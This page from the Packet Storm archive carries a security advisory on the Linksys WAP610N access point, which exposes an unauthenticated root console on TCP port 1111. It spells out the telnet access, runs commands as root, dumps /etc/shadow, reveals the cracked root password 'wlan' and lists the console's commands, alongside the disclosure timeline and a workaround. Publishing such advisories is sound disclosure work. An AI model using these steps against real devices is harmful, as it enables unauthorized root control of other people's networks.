exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linksys WAP610N Unauthenticated Access With Root Privileges

Linksys WAP610N Unauthenticated Access With Root Privileges
Posted Feb 10, 2011
Authored by Matteo Ignaccolo

Linksys WAP610N is a SOHO wireless access point that allows remote unauthenticated root access on TCP port 1111.

tags | exploit, remote, root, tcp
SHA-256 | de0f690f14734c0bdb5d979f5549b27881d4226daff2f7bf6e1eac0775748d05

Linksys WAP610N Unauthenticated Access With Root Privileges

Change Mirror Download
Secure Network - Security Research Advisory

Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
Systems affected: WAP610N (Firmware Version: 1.0.01)
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.linksysbycisco.com
Author(s): Matteo Ignaccolo m.ignaccolo@securenetwork.it
Vendor disclosure: 14/06/2010
Vendor acknowledged: 14/06/2010
Vendor bugfix: 14/12/2010 (reply to our request for update)
Vendor patch release: ??
Public disclosure: 10/02/2010
Advisory number: SN-2010-08
Advisory URL:
http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt


*** SUMMARY ***

Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.

Unauthenticated remote textual administration console has been found that
allow an attacker to run system command as root user.


*** VULNERABILITY DETAILS ***

telnet <access-point IP> 1111

Command> system id
Output> uid=0(root) gid=0(root)

Coomand> system cat /etc/shadow
Ouptup> root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
Ouptup> bin:*:10933:0:99999:7:::
Ouptup> daemon:*:10933:0:99999:7:::
Ouptup> adm:*:10933:0:99999:7:::
Ouptup> lp:*:10933:0:99999:7:::
Ouptup> sync:*:10933:0:99999:7:::
Ouptup> shutdown:*:10933:0:99999:7:::
Ouptup> halt:*:10933:0:99999:7:::
Ouptup> uucp:*:10933

root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)

List of console's command:

ATHENA_READ
ATHENA_WRITE
CHIPVAR_GET
DEBUGTABLE
DITEM
DMEM
DREG16
DREG32
DREG8
DRV_CAT_FREE
DRV_CAT_INIT
DRV_NAME_GET
DRV_VAL_GET
DRV_VAL_SET
EXIT
GENIOCTL
GETMIB
HELP
HYP_READ
HYP_WRITE
HYP_WRITEBUFFER
ITEM16
ITEM32
ITEM8
ITEMLIST
MACCALIBRATE
MACVARGET
MACVARSET
MEM_READ
MEM_WRITE
MTAPI
PITEMLIST
PRINT_LEVEL
PROM_READ
PROM_WRITE
READ_FILE
REBOOT
RECONF
RG_CONF_GET
RG_CONF_SET
RG_SHELL
SETMIB
SHELL
STR_READ
STR_WRITE
SYSTEM
TEST32
TFTP_GET
TFTP_PUT
VER


*** EXPLOIT ***

Attackers may exploit these issues through a common telnet client as explained
above.


*** FIX INFORMATION ***

No patch is available.

*** WORKAROUNDS ***

Put access points on separate wired network and filter network traffic to/from
1111 tcp port.


*********************
*** LEGAL NOTICES ***
*********************

Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.

We are committed to open, full disclosure of vulnerabilities, cooperating
whenever possible with software developers for properly handling disclosure.

This advisory is copyright 2009 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network.

The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.

E-mail: securenetwork@securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24 12 67 88

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close